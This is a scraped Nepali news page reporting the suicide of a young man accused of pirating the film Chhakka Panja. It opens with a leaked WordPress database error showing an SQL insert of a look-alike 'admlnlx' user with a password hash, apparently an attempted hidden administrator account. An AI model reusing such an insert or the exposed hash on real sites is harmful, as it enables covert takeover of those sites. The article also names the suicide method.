WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BA/BGFKTf93JqImvM2OSc9.noH4jPO.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:46:07', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस २९ –
छक्का पन्जा चलचित्र पाइरेसी गर्ने एक युवाले आत्महत्या गरेका छन् । नवलपरासीको कावासोती घर भएका २३ वर्षे कृष्ण सुवेदीले आत्महत्या गरेका हुन् । काठमाडौंको चावहिलस्थित विजय चोक बस्ने सुवेदीले गएराति आफ्नै कोठमा झुण्डिएर आत्महत्या गरेको गौशाला प्रहरी वृतका डिएसपी नवराज कार्कीले जानकारी दिनुभयो।
‘उनी झुण्डिएको अवस्थामा कोठामा फेला परेका थिए । हामीले उनको परिवारलाई सम्र्पक गर्दा शव नचलाउनु भनेकाले हामीले रातभर उनको कोठमा शव रुग्याँै । आज बिहान उनका बुबा आमा आएर शव बुझेका छन्’ डिएसपी कार्कीले भन्नुभयो ।
शव अहिले पोष्टमार्टमका लागि त्रिवि शिक्षण अस्पताल महाराजगंज लगिएको छ । उनी चलचित्र छक्का पन्जा पाइरेसी गर्ने पहिलो व्यक्ति हुन् । उनलाई प्रहरीले पाइरेसी गरेको अभियोगमा समातेर निर्माताको आग्रहपछि सामान्य तारिकमा छाडेको थियो । बिहीबार चलचित्र फेसबुकमा भाइरल भएपछि उनले आत्महत्या गरेका हुन् ।
उज्यालोवाट